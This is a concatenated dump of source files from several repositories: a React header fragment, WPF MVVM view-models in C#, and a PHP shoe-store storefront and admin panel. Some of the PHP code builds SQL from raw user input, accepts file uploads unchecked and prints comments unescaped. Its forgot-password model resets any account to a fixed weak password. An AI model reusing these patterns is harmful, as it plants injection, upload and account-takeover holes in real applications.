</Link>
<Link to="/" className="header__link">
<div className="header__option">
<span className="header__optionLineTwo">SALES</span>
</div>
</Link>
<Link to="/" className="header__link">
<div className="header__option">
<span className="header__optionLineTwo">CATEGORIES</span>
</div>
</Link>
<Link to="/" className="header__link">
<div className="header__option">
<span className="header__optionLineTwo">CONTACT US</span>
</div>
</Link>
</div>
<div className="header__link2">
<Link to="/checkout" className="header__link">
<span>
<SearchIcon/>
</span>
</Link>
<Link to="/checkout" className="header__link">
<div className="header__optionBasket">
<span>
<AccountCircleOutlinedIcon/>
</span>
</div>
</Link>
<Link to="/checkout" className="header__link">
<div className="header__optionBasket">
<span>
<LocalMallOutlinedIcon />
</span>
<span className="header_optionLineTwo header_basketCount">{basket?.length}</span>
</div>
</Link>
</div>
</div>
</nav>
}
export default Header
|
294bde1941b2522ef8dd22ab905e25f2dbb2b862
|
[
"JavaScript"
] | 1
|
JavaScript
|
haziqothman/HHD-tech
|
c77ba5a11adce252fc7e9eb60d9c6925a9abb803
|
16cfd014803eec402b41f6a72e1e1430c4ed0640
|
refs/heads/master
|
<file_sep>using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace WpfApp2
{
public class MessageViewModel : INotifyPropertyChanged
{
private string _contenu;
public string Contenu
{
get { return _contenu; }
set
{
_contenu = value;
OnPropertyChanged("Contenu");
}
}
private string _emetteur;
public string Emetteur
{
get { return _emetteur; }
set
{
_emetteur = value;
OnPropertyChanged("Emetteur");
}
}
private DateTime _date;
public event PropertyChangedEventHandler PropertyChanged;
protected void OnPropertyChanged(string name)
{
PropertyChanged?.Invoke(this, new PropertyChangedEventArgs(name));
}
public DateTime Date
{
get { return _date; }
set
{
_date = value;
OnPropertyChanged("Date");
}
}
public override string ToString()
{
return $"{Contenu} {Emetteur} {Date}";
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.ComponentModel;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Input;
namespace WpfApp2
{
public class MyViewModel : INotifyPropertyChanged
{
public event PropertyChangedEventHandler PropertyChanged;
protected void OnPropertyChanged(string name)
{
PropertyChanged?.Invoke(this, new PropertyChangedEventArgs(name));
}
#region WPF_listes_et_controles
public int Index { get; set; }
public ObservableCollection<string> Valeurs { get; set; } = new ObservableCollection<string> { "Heeeeee", "Haaaaa" };
private string _test = "Hello !";
public string Test
{
get { return _test; }
set
{
_test = value;
OnPropertyChanged(nameof(Test)); // Notifie la vue que la propriété "Test" a été modifié} }
}
}
public ICommand EditInput
{
get
{
return new RelayCommand(param =>
{
Test = "Test";
});
}
}
public ICommand EditList
{
get
{
return new RelayCommand(param =>
{
Valeurs.Add(Test);
});
}
}
public ICommand DeleteElementList
{
get
{
return new RelayCommand(
execute: param => Valeurs.RemoveAt(0),
canExecute: param => Valeurs.Count() > 0
);
}
}
public ICommand UpdateList
{
get
{
return new RelayCommand(param =>
{
if (Valeurs.Contains(Test))
Valeurs.Remove(Test);
else
Valeurs.Add(Test);
});
}
}
public ObservableCollection<MessageViewModel> Messages { get; set; } = new ObservableCollection<MessageViewModel> { new MessageViewModel { Contenu = "Contenu 1", Date = DateTime.Now.AddDays(10), Emetteur = "Emmetteur1" } };
public ICommand AddMessage
{
get
{
return new RelayCommand(param =>
{
Messages.Add(new MessageViewModel { Contenu = "Contenu1", Emetteur = "Emetteur1", Date = DateTime.Now });
});
}
}
public ICommand ModifyMessage
{
get
{
return new RelayCommand(
execute: param => Messages[selectedIndex].Contenu = "Contenu_modified",
canExecute: param => Messages.Count() > 0
);
}
}
public ICommand DeleteFirstMessage
{
get
{
return new RelayCommand(
execute: param => Messages.RemoveAt(0),
canExecute: param => Messages.Count() > 0
);
}
}
private int selectedIndex;
public int SelectedIndex
{
get { return selectedIndex; }
set
{
selectedIndex = value;
OnPropertyChanged(nameof(SelectedIndex));
}
}
public ICommand DeleteSelectedMessage
{
get
{
return new RelayCommand(
execute: param => Messages.RemoveAt(SelectedIndex),
canExecute: param => Messages.Count() > 0
);
}
}
public ICommand RemoveThisMessage
{
get
{
return new RelayCommand(
execute: param => Messages.Remove((MessageViewModel)param)
);
}
}
public ObservableCollection<string> ListeImages { get; set; } = new ObservableCollection<string> { "/Images/image1.jpg", "/Images/image2.jpg", "/Images/image3.jpg", "image4.jpg" };
#endregion
#region Cas_Pratiques_MVVM
private int _compteur;
public int Compteur
{
get { return _compteur; }
set
{
_compteur = value;
OnPropertyChanged(nameof(Compteur));
}
}
public ICommand Augmenter
{
get
{
return new RelayCommand(param =>
{
Compteur++;
});
}
}
public ICommand Diminuer
{
get
{
return new RelayCommand(param =>
{
Compteur--;
});
}
}
public ICommand Reinitialiser
{
get
{
return new RelayCommand(param =>
{
Compteur = 0;
});
}
}
public ICommand GenericModify
{
get
{
return new RelayCommand(param =>
{
if (param.ToString() == "add")
Compteur++;
else if (param.ToString() == "del")
Compteur--;
else if (param.ToString() == "reset")
Compteur = 0;
else
throw new Exception();
});
}
}
#endregion
}
}
|
2beecf9d47e5f4a3dee329ed14e56c37a1c33465
|
[
"C#"
] | 2
|
C#
|
antoine4790/WpfApp
|
6589521f22044dd54bad1e404bfe2a3ea4cb0704
|
ccc1ed20d88f07061fb0eef90a90dfcd3f98f00e
|
refs/heads/master
|
<repo_name>destimon/python-telegram-bot<file_sep>/bot.py
from datetime import datetime
import telebot
from profanity import profanity
from config import config
bot = telebot.TeleBot(config.token)
help_message = "/time - Get actual date\n/word [WORD] - repeat word"
time_message = "The actual time is: " + str(datetime.now())
# Commands Handler
@bot.message_handler(commands=['help'])
def send_command(message):
bot.reply_to(message, help_message)
@bot.message_handler(commands=['time'])
def send_command(message):
bot.reply_to(message, time_message)
@bot.message_handler(commands=['word'])
def send_command(message):
bot.reply_to(message, message.text.split()[1:])
# Message Handler
@bot.message_handler(content_types=["text"])
def echo_message(msg):
if profanity.contains_profanity(msg.text):
# Bad Words
bot.send_message(msg.chat.id, "Ew. Don't use words like this!")
elif msg.text.lower() == "hello":
# Greetings
bot.send_message(msg.chat.id, "Hi!")
elif msg.text.lower().find("hello") > 0:
# Suggestions
bot.send_message(msg.chat.id, "You mean 'hello'?\nHello!")
else:
# Handle unexpected
bot.send_message(msg.chat.id, "I don't understand you, sorry.")
if __name__ == '__main__':
print("Start polling...")
print("Token: ", config.token)
bot.polling(none_stop = True)
<file_sep>/README.md
# python-telegram-bot
Just another telegram bot written on Python.
TODO:
* Message Handler
* Hello response **[DONE]**
* Some bad-words cases response **[DONE]**
* Suggesting **[DONE]**
* Commands
* /help **[DONE]**
* /time **[DONE]**
* /word [WORD] (display word) **[DONE]**
* Keyboard
* Basic Menu
<file_sep>/config/config_sample.py
token = '<PASSWORD> TOKEN'
# Usage:
# import <THIS MODULE> anywhere
# <THIS MODULE>.token - is your token variable
|
87bd74593aa8c4c6a3fbea3de32b2c9eccedfa89
|
[
"Markdown",
"Python"
] | 3
|
Python
|
destimon/python-telegram-bot
|
273519a8ea2471bb053c75edaa7532819b0a16b6
|
8e9deea775fc1560f6dcfcd7f157755ad0526fae
|
refs/heads/master
|
<repo_name>hieuthanh1999/StoreHongAn<file_sep>/views/sanphamlienquan/sanphamlienquan.php
<!-- related product area start-->
<div class="related-product home2">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="product-title">
<h2>related products</h2>
</div>
</div>
</div>
<div class="row">
<div class="related-slider">
<?php foreach ($data_sanphamlienquan as $value) : ?>
<div class="col-md-12">
<div class="single-product">
<div class="product-img">
<a href="?action=chitietmathang&id=<?= $value['idSP'] ?>&idLoaiSP=<?= $value['idLoaiSP'] ?>">
<img class="primary-img-1" src="admin/public_admin/image/sanpham/<?php echo $value['anh1'] ?>" alt="">
<img class="primary-img-2" src="admin/public_admin/image/sanpham/<?php echo $value['anh1'] ?>" alt="">
</a>
</div>
<div class="list-product-info">
<div class="price-rating">
<div class="ratings">
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star-half-o"></i>
<a href="#" class="review">1 Review(s)</a>
<a href="#" class="add-review">Add Your Review</a>
</div>
</div>
</div>
<div class="product-price">
<div class="product-name">
<a href=""><?php echo $value['tenSP'] ?></a>
</div>
<div class="price-rating">
<span><?= number_format($value['Dongia']) ?> VND</span>
</div>
</div>
</div>
</div>
<?php
endforeach
?>
</div>
</div>
</div>
</div>
<!-- related product area end--><file_sep>/views/thanhtoan/thanhtoan.php
<!-- trang checkout -->
<div class="shopping-cart">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="index.html" title="go to homepage">Home<span>/</span></a> </li>
<li><strong> Shopping cart</strong></li>
</ul>
</div>
</div>
</div>
<div class="pages-title section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12">
<div class="pages-title-text text-center">
<h2>Thanh Toán</h2>
</div>
</div>
</div>
</div>
</div>
<section class="pages checkout section-padding">
<div class="container">
<div class="row">
<div class="col-sm-6">
<div class="main-input single-cart-form padding60">
<div class="log-title">
<h3><strong>Chi tiết hóa đơn</strong></h3>
</div>
<div class="custom-input">
<form action="?action=hoanthanhdonhang&idUser=<?php echo $data_user['idUser']; ?>" method="post">
<input type="text" name="NguoiNhan" placeholder="<NAME>" required value="<?php echo $data_user['ho'] . ' ' . $data_user['ten']; ?>" />
<input type="email" name="Email" placeholder="Địa chỉ Email.." required value="<?php echo $data_user['email']; ?>" />
<input type="text" name="SDT" placeholder="Số điện thoại.." required pattern="[0-9]+" minlength="10" value="<?php echo $data_user['sodienthoai']; ?>" />
<input type="text" name="DiaChi" placeholder="Đại chỉ giao hàng" required value="<?php echo $data_user['diachi']; ?>" />
<br>
<div class="submit-text">
<button type="submit">Thanh toán</button>
</div>
</form>
</div>
</div>
</div>
<div class="col-xs-12 col-sm-6">
<div class="padding60">
<div class="log-title">
<h3><strong>Hóa đơn</strong></h3>
</div>
<div class="cart-form-text pay-details table-responsive">
<table>
<thead>
<tr>
<th>Sản phẩm</th>
<td>Thành Tiền</td>
</tr>
</thead>
<tbody>
<tr>
<th><?php foreach ($_SESSION['sanpham'] as $key => $value) { ?>
<?php echo $value['tenSP']; ?>
<?php echo "SL: " . $value['soluong'] . '<br>'; ?>
<?php } ?>
</th>
<td>
<?php echo $_SESSION['tongtien'] . '.000 vnd<br>'; ?>
</td>
</tr>
<tr>
<th>Giảm Giá</th> <!-- lấy a trên địa chỉ rồi inner join với bảng khuyễn mã để lấy giá trị khuyến mãi -->
<td><?php $_SESSION['giatriKM'] = $data_sanpham['giatriKM'];
echo $_SESSION['giatriKM'] . '%'; ?></td>
</tr>
</tbody>
<tfoot>
<tr>
<th>Tổng</th>
<td>
<?php
if ($_SESSION['giatriKM'] != 0) {
$_SESSION['tongtien_KM'] = ($_SESSION['tongtien'] - ($_SESSION['tongtien'] * ($data_sanpham['giatriKM'])) / 100);
echo $_SESSION['tongtien_KM'];
} else {
echo $_SESSION['tongtien'];
}
?>.000 VNĐ
</td>
</tr>
</tfoot>
</table>
</div>
</div>
</div>
</div>
</div>
</section>
</div>
</div><file_sep>/admin/views_admin/sanpham/quanlysanpham.php
<div class="col-md-12">
<div style="margin-bottom:5px;">
<?php if ($_SESSION['admin'] == true) { ?>
<a href="?action=them_sanpham_giaodien" class="btn btn-primary">Thêm sản phẩm</a>
<?php } else {
} ?>
</div>
<div class="panel panel-primary">
<div class="panel-heading">Danh sách Sản Phẩm</div>
<div class="panel-body">
<table class="table table-bordered table-hover " style="text-align:center;">
<tr>
<th style="text-align:center;">STT</th>
<th style="text-align:center;">Mã sản phẩm</th>
<th style="text-align:center;">Tên sản phẩm</th>
<th style="text-align:center;">Giá thành</th>
<th style="text-align:center;">Loại sản phẩm</th>
<th style="text-align:center;">Số lượng</th>
<th style="text-align:center;">Hình ảnh</th>
<th style="text-align:center;">Hành động</th>
</tr>
<?php
//var_dump($cate);
$stt = 1;
foreach ($data as $value) : ?>
<tr>
<td><?= $stt++; ?></td>
<td><?= $value['idSP'] ?></td>
<td><?= $value['tenSP'] ?></td>
<td><?= number_format($value['Dongia']); ?></td>
<td>
<?php foreach ($dataCate as $row) {
if ($value['idLoaiSP'] == $row['idLoaiSP']) {
echo $value['idLoaiSP'];
}
} ?>
</td>
<td><?= $value['soluong'] ?>
<br>
<?php if ($value['soluong'] < 10) { ?>
<a class="soluong" href="?action=them_soluong_giaodien&soluong=<?php echo $value['soluong'] ?>&idSP=<?php echo $value['idSP'] ?>"><br>Số lượng nhỏ hơn 10<br></a>
<?php } ?>
</td>
<td>
<img style="width:350px; height:300px" src="./public_admin/image/sanpham/<?php echo $value['anh1'] ?>" alt="">
</td>
<td>
<?php if ($_SESSION['admin'] == true) { ?>
<a href="?action=suasanpham&id=<?= $value['idSP'] ?>" type="button" class="btn btn-light">Sửa</a>
<a href="?action=xoasanpham&id=<?= $value['idSP'] ?>" onclick="return confirm('Bạn có thật sự muốn xóa ?');" type="button" class="btn btn-danger" title="Xóa ">
<i class="fa fa-times"></i></a>
<?php } else {
} ?>
</td>
</tr>
<?php
endforeach;
?>
</table>
<span style="font-size: 20px;">
<?php
if (!isset($timkiem_sp)) {
$tong = ceil($tongsotrang);
for ($i = 1; $i <= $tong; $i++) {
echo '<a href="?action=sanpham&trang=' . $i . '">' . $i . '</a> | ';
}
}
?>
</span>
<style type="text/css">
.pagination {
padding: 0px;
margin: 0px;
}
</style>
</div>
</div>
</div>
<!-- end content -->
<script>
function myFunction() {
var x = document.getElementById("myDIV");
if (x.style.display === "block") {
x.style.display = "none";
} else {
x.style.display = "block";
}
}
</script><file_sep>/views/chitietmathang/chitietmathang.php
<div id="main-content-wp" class="detail-product-page">
<!-- single product area start -->
<div class="Single-product-location home2">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="?page=home" title="go to homepage">Home<span>/</span></a> </li>
<li><strong><?php echo $data_chitiet['tenSP']; ?></strong></li>
</ul>
</div>
</div>
</div>
</div>
</div>
<!-- single product area end -->
<!-- single product details start -->
<div class="single-product-details">
<div class="container">
<div class="row">
<div class="col-sm-6">
<div class="single-product-img tab-content">
<div class="single-pro-main-image tab-pane active" id="pro-large-img-1">
<a href="#">
<img class="optima_zoom" src="admin/public_admin/image/sanpham/<?php echo $data_chitiet['anh1']; ?>" data-zoom-image="admin/public_admin/image/sanpham/<?php echo $data_chitiet['anh1']; ?>">
</a>
</div>
</div>
<div class="product-page-slider">
<div class="single-product-slider">
<a href="#pro-large-img-1" data-toggle="tab">
<img src="admin/public_admin/image/sanpham/<?php echo $data_chitiet['anh2']; ?>" alt="" class="simpleLens-big-image">
</a>
</div>
<div class="single-product-slider">
<a href="#pro-large-img-1" data-toggle="tab">
<img src="admin/public_admin/image/sanpham/<?php echo $data_chitiet['anh3']; ?>" alt="" class="simpleLens-big-image">
</a>
</div>
</div>
</div>
<div class="col-sm-6">
<div class="single-product-details">
<a href="#" class="product-name"><?php echo $data_chitiet['tenSP']; ?></a>
<div class="list-product-info">
<div class="price-rating">
<div class="ratings">
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star-half-o"></i>
<a href="#" class="review">1 Review(s)</a>
<a href="#" class="add-review">Add Your Review</a>
</div>
</div>
</div>
<div class="avalable">
<p>Availability:<span>
<?php if ($size['soluong'] < 1) {
echo "hết hàng";
} else {
echo "còn hàng";
} ?>
</span></p>
</div>
<div class="item-price">
<span>Sale: <?php echo number_format($data_chitiet['Dongia']); ?> VND</span>
<!-- <span class="price-new" style="text-decoration: line-through;">Giá gốc: <?php echo number_format($product->price); ?> VND</span> -->
<form action="../../cart/index" method="POST">
<input type="hidden" name="namess" value="<?php echo $product->name; ?>">
<input type="hidden" name="idproductss" value="<?php echo number_format($product->id); ?>">
<div class="select-catagory">
<div class="size-select">
<label class="required">
<em>*</em> Màu sắc : <?php echo $ten_color['color']; ?>
</label>
<!-- <div class="input-box" style="width:30%">
<select name="color" id="select-1">
<option style="text-align:center" value=""></option>
</select>
</div> -->
</div>
<div class="size-select">
<label class="required">
<em>*</em> Size: <?php echo $size['size']; ?>
</label>
<!-- <div class="input-box" style="width:30%; ">
<select name="size" id="select-2">
<option style="text-align:center" value="">-- Please Select --</option>
</select>
</div> -->
</div>
</div>
<div class="cart-item">
<div class="single-cart">
<!--
<label>Số lượng: </label>
<select style="width: 100px; height: 40px; margin-top:10px;" name="select_amount">
<?php for ($i = 1; $i <= $product->amount; $i++) { ?>
<option value="<?= $i ?>"><?= $i ?></option>
<?php } ?>
</select> -->
<br>
<a class="cart-btn" href="?action=giohang&act=add_giohang&id=<?= $data_chitiet['idSP'] ?>">ADD TO CART</a>
<!-- <input id="add-to-cart" class="cart-btn" type="submit" name="submitcart" value="ADD TO CART"> -->
<!-- <input id="buy-now" class="cart-btn" type="submit" name="buynow" value="BUY NOW"> -->
</div>
</div>
</form>
</div>
<div class="single-product-info">
<p><?php echo $data_chitiet['mota']; ?></p>
<div class="share">
<img src="public/img/product/share.png" alt="">
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- single product details end -->
<!-- single product tab start -->
<div class="single-product-tab-area">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="single-product-tab">
<ul class="single-product-tab-navigation" role="tablist">
<li role="presentation" class="active"><a href="#tab1" aria-controls="tab1" role="tab" data-toggle="tab">Chi tiết sản phẩm</a></li>
<li role="presentation"><a href="#tab2" aria-controls="tab2" role="tab" data-toggle="tab">Bình luận</a></li>
<!-- <li role="presentation"><a href="#tab3" aria-controls="tab3" role="tab" data-toggle="tab">product tag</a></li> -->
</ul>
<!-- Tab panes -->
<div class="tab-content single-product-page">
<div role="tabpanel" class="tab-pane fade in active" id="tab1">
<div class="single-p-tab-content">
<div class="tb">
<h5>ĐẶC ĐIỂM</h5>
<ul>
<li>
<span>kiểu giày: <span><?php echo $ten_loaisanpham['tenLSP']; ?></span></span>
</li>
<li>
<span>Màu sắc: <span><?php echo $ten_color['color']; ?></span></span>
</li>
<li>
<span>Kích cỡ: <span><?php echo $size['size']; ?></span></span>
</li>
<li>
<span>Số lượng còn trong kho: <span><?php echo $size['soluong']; ?></span></span>
</li>
<li>
<span>Ngày nhập: <span><?php echo $data_chitiet['ngaynhap']; ?></span></span>
</li>
</ul>
</div>
</div>
</div>
<div role="tabpanel" class="tab-pane fade" id="tab2">
<div class="single-p-tab-content">
<div class="row">
<?php foreach ($xem_gopy as $value) { ?>
<?php if ($data_chitiet['idSP'] == $value['idSP']) { ?>
<div style="padding: 20px; border: 1px dotted gray; width: 100%; margin: 5px; border-radius: 10px;">
<span> <STRONG>
<?php echo $value['email']; ?>
</STRONG>
<span style="padding-left: 30px">
<?php echo $value['noidung']; ?>
</span><span>
</div>
<?php } ?>
<?php } ?>
<form action="?action=gopy&id=<?php echo $data_chitiet['idSP']; ?>" method="POST" style="margin-top: 20px; border: 1px dotted gray; padding-left: 10px; padding-top: 5px; border-radius: 10px">
<input type="hidden" name="idSP" value="<?php echo $data_chitiet['idSP']; ?>">
<input style="margin-top: 10px;font-family: inherit; font-size: inherit; line-height: inherit; height: 40px;display: block;padding: 10px 10px;border: 1px solid #ddd;width: 35%;margin-bottom: 15px;" type="text" name="email_gopy" placeholder="Email của bạn"><br>
<textarea placeholder="Nội dung..." style="font-family: inherit; font-size: inherit; line-height: inherit; height: 50px;display: block;padding: 5px 10px;border: 1px solid #ddd;width: 95%;margin-bottom: 15px; resize: none;" name="noidung_gopy"></textarea><br>
<input style="display: block;border: none;outline: none;background: #4fa327;color: #fff;padding: 8px 20px;margin-bottom: 50px;" type="submit" name="submitcomment" value="ADD COMMENT">
</form>
<?php
?>
</div>
</div>
</div>
<!-- <div role="tabpanel" class="tab-pane fade" id="tab3">
<div class="single-p-tab-content">
<div class="add-tab-title">
<p> add your tag </p>
</div>
<div class="add-tag">
<form action="#">
<input type="text">
<button type="submit">add tags</button>
</form>
</div>
<p class="tag-rules">Use spaces to separate tags. Use single quotes (') for phrases.</p>
</div>
</div> -->
</div>
</div>
</div>
</div>
</div>
</div>
<!-- single product tab end -->
</div><file_sep>/admin/controller_admin/duyethoadon.php
<?php
// CONTROLLER DÙNG Đ<NAME>I CÁC HÀM TRONG MODEL
require_once('./model_admin/sanpham.php');
require_once('./model_admin/hoadon.php'); // đã gọi được rồi
require_once('./model_admin/nguoidung.php');
/**
*
*/
class hoadoncontroller
{
var $hoadon_model;
var $sanpham_model;
var $nguoidung_model;
public function __construct()
{
$this->hoadon_model = new hoadon();
$this->sanpham_model = new sanpham();
$this->nguoidung_model = new nguoidung();
}
public function list()
{
if(isset($_POST['timkiem_hd'])){
$timkiem_hd = $_POST['timkiem_hd'];
$data = $this->hoadon_model->timkiem_hd($timkiem_hd);
}else{
$data = $this->hoadon_model->all();
$sanpham = $this->sanpham_model->all_them();
$user = $this->nguoidung_model->getAll();
}
require_once('views_admin/index.php');
}
public function details() //đang
{
$id = isset($_GET['id']) ? $_GET['id'] : 1;
$data = $this->hoadon_model->find($id);
require_once('views_admin/index.php');
}
public function xoahoadon() //chưa
{
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$this->hoadon_model->delete($id);
}
public function chitiet_hoadon()
{
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$data = $this->hoadon_model->find($id);
$idUser = isset($_GET['idUser']) ? $_GET['idUser'] : '1';
$name_user = $this->hoadon_model->user($idUser);
$idSP = isset($_GET['idSP']) ? $_GET['idSP'] : '1';
$name_sanpham = $this->hoadon_model->sanpham($idSP);
require_once('views_admin/index.php');
}
public function duyet_hoadon()
{
$id = $_GET['id'];
$this->hoadon_model->duyet_hoadon($id);
$idSP = $_GET['idSP'];
$sotru = $_GET['soluongmua'];
$this->hoadon_model->sanpham_tru($idSP, $sotru);
require_once('views_admin/index.php');
}
}
<file_sep>/admin/controller_admin/quanlybanner.php
<?php
// CONTROLLER <NAME>ÁC HÀM TRONG MODEL
require_once('./model_admin/banner.php'); // đã gọi được rồi
/**
*
*/
class bannercontroller
{
var $banner_model;
public function __construct()
{
$this->banner_model = new banner();
}
public function list()
{
if(isset($_POST['timkiem_bn'])){
$timkiem_bn = $_POST['timkiem_bn'];
$data = $this->banner_model->timkiem_bn($timkiem_bn);
}else{
$data = $this->banner_model->all();
}
require_once('views_admin/index.php');
}
public function details()
{
$id = isset($_GET['id']) ? $_GET['id'] : 1;
$data = $this->banner_model->find($id);
require_once('views_admin/index.php');
}
public function update()
{
$idbanner = filter_input(INPUT_POST, 'idbanner');
$anh = $_FILES['anh']['name'];
$anh_tmp = $_FILES['anh']['tmp_name'];
move_uploaded_file($anh_tmp, './public_admin/image/banner/'.$anh);
$this->banner_model->update($idbanner, $anh);
}
public function them()
{
$idbanner = filter_input(INPUT_POST, 'idbanner');
$anhbanner = $_FILES['anhbanner']['name'];
$anhbanner_tmp = $_FILES['anhbanner']['tmp_name'];
move_uploaded_file($anhbanner_tmp, './public_admin/image/banner/'.$anhbanner);
$this->banner_model->insert($idbanner, $anhbanner);
}
public function xoabanner()
{
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$this->banner_model->delete($id);
}
}
?><file_sep>/admin/views_admin/index.php
<!DOCTYPE html>
<html>
<head>
<title>Admin Shoe Store</title>
<meta charset="utf-8">
<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
<!-- Bootstrap 3.3.7 -->
<link rel="stylesheet" href="public_admin/assets/css/bootstrap.min.css">
<!-- Font Awesome -->
<link rel="stylesheet" href="public_admin/assets/css/font-awesome.min.css">
<link rel="stylesheet" href="public_admin/assets/css/AdminLTE.min.css">
<!-- AdminLTE Skins. Choose a skin from the css/skins
folder instead of downloading all of them to reduce the load. -->
<link rel="stylesheet" href="public_admin/assets/css/_all-skins.min.css">
<!-- Google Font -->
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,300italic,400italic,600italic">
<script type="text/javascript" src="public_admin/ckeditor/ckeditor.js"></script>
<script type="text/javascript" src="public_admin/ckfinder/ckfinder.js"></script>
<!-- css -->
<link rel="stylesheet" type="text/css" href="public_admin/css/style.css">
<link rel="stylesheet" type="text/css" href="public_admin/css/bootstrap.min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
<link rel="stylesheet" type="text/css" href="public_admin/css/font-awesome.min.css">
<script type="text/javascript" src="views_admin/sanpham/ckeditor/ckeditor.js"></script>
</head>
<body>
<?php
require_once('layout/layout.php');
?>
<?php
require_once('dieuhuong.php');
?>
<?php
require_once('layout/footer.php');
?>
</body>
<!-- ./wrapper -->
<!-- jQuery 3 -->
<script src="public_admin/assets/js/jquery.min.js"></script>
<!-- jQuery UI 1.11.4 -->
<script src="public_admin/assets/js/jquery-ui.min.js"></script>
<!-- Bootstrap 3.3.7 -->
<script src="public_admin/assets/js/bootstrap.min.js"></script>
<!-- AdminLTE App -->
<script src="public_admin/assets/js/adminlte.min.js"></script>
</html>
<file_sep>/model/quenMK.php
<?php
require_once('ketnoi.php');
/**
*
*/
class Matkhau
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function loaisanpham()
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function laymatkhau($email)
{
// $query = "SELECT matkhau FROM user WHERE email = '$email' ";
$mk = md5(12345);
$query2 = "UPDATE user SET matkhau = '$mk' WHERE email='$email' ";
// return $this->conn->query($query)->fetch_assoc();
return $this->conn->query($query2);
}
}
<file_sep>/views/slider/slider.php
<div class="slider-area home2">
<div class="bend niceties preview-2">
<div id="nivoslider" class="slides">
<?php
$i = 0;
$array = '#slider-direction-';
foreach ($data_banner as $value) {
$i++;
?>
<img src="admin/public_admin/image/banner/<?php echo $value['anh'] ?>" alt="" title="<?php echo ($array . $i); ?>">
<?php } ?>
</div>
<!-- direction 1 -->
<div id="slider-direction-1" class="t-cn slider-direction">
<div class="slider-progress"></div>
<div class="slider-content t-lfl s-tb slider-1">
<div class="title-container s-tb-c title-compress">
<h1 class="title1">Khuyến mãi</h1>
<h2 class="title2">Khuyến Mãi Hấp Dẫn Lên Đến 30%</h2>
<h3 class="title3"></h3>
<a href="#"><span>Mua Ngay</span></a>
</div>
</div>
</div>
<!-- direction 2 -->
<div id="slider-direction-2" class="slider-direction">
<div class="slider-progress"></div>
<div class="slider-content t-lfl s-tb slider-2">
<div class="title-container s-tb-c">
<h1 class="title1">Khuyến mãi đặc biệt</h1>
<h2 class="title2">sports center james</h2>
<h3 class="title3">Lorem Ipsum is simply dummy text of the printing</h3>
<a href="#"><span>Mua Ngay</span></a>
</div>
</div>
</div>
</div>
</div>
<!-- slider area end -->
<!-- service area start -->
<div class="service-area">
<div class="container">
<div class="row">
<div class="col-sm-4">
<div class="single-service">
<div class="sirvice-img">
<img src="public/img/service/icon-1.png" alt="">
</div>
<div class="service-info">
<h3>UY TÍN</h3>
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh.</p>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="single-service">
<div class="sirvice-img">
<img src="public/img/service/icon-1.png" alt="">
</div>
<div class="service-info">
<h3>CHẤT LƯỢNG</h3>
<p>Các nhãn hiệu đắt đỏ được giới trẻ săn lùng như Bape, Jordan, Yeezy, MLB, Human Race... </p>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="single-service">
<div class="sirvice-img">
<img src="public/img/service/icon-1.png" alt="">
</div>
<div class="service-info">
<h3>THỜI THƯỢNG</h3>
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh.</p>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- service area end --><file_sep>/controller/cuahang_controller.php
<?php
// require_once('views/index.php'); gọi câu mới xuất hiện giao diện được
require_once('./model/show_cuahang.php');
/**
*
*/
class showcuahang
{
var $banner_controller;
function __construct()
{
$this->cuahang_controller = new cuahang();
}
public function list()
{
if(isset($_GET['id'])){
$idLoaiSP = $_GET['id'];
$data_sanphamcuahang = $this->cuahang_controller->sanpham_cuahangtheoid($idLoaiSP);
}else{
$idLoaiSP = null;
}
$data_loaisanpham = $this->cuahang_controller->loaisanpham();
$color = $this->cuahang_controller->color();
$size = $this->cuahang_controller->size();
if(isset($_GET['idmau'])){
$idmau = $_GET['idmau'];
$data_sanphamcuahang = $this->cuahang_controller->chonsanpham_mau($idmau);
}else{
$idmau = null;
}
if(isset($_GET['idsize'])){
$idsize = $_GET['idsize'];
$data_sanphamcuahang = $this->cuahang_controller->chonsanpham_size($idsize);
}else{
$idsize = null;
}
if(isset($_POST['a']) && isset($_POST['b'])){
$a = $_POST['a'];
$b = $_POST['b'];
$data_sanphamcuahang = $this->cuahang_controller->chonsanpham_gia($a, $b);
}else{
$a = null;
$b = null;
}
// chọn sản phẩm có khuyến mãi
if(isset($_GET['gtkm'])){
$gtkm = $_GET['gtkm'];
$data_sanphamcuahang = $this->cuahang_controller->chonsanpham_km($gtkm);
}else{
$gtkm = null;
}
require_once('views/index.php');
}
public function list1()
{
$data_loaisanpham = $this->cuahang_controller->loaisanpham();
$color = $this->cuahang_controller->color();
$size = $this->cuahang_controller->size();
if(isset($_POST['timkiem_sp'])){
$timkiem_sp = $_POST['timkiem_sp'];
$data_sanphamcuahang = $this->cuahang_controller->timkiem_sp($timkiem_sp);
}else{
$data_sanphamcuahang = $this->cuahang_controller->sanpham_cuahang();
}
if(isset($_POST['a'])&& isset($_POST['b'])){
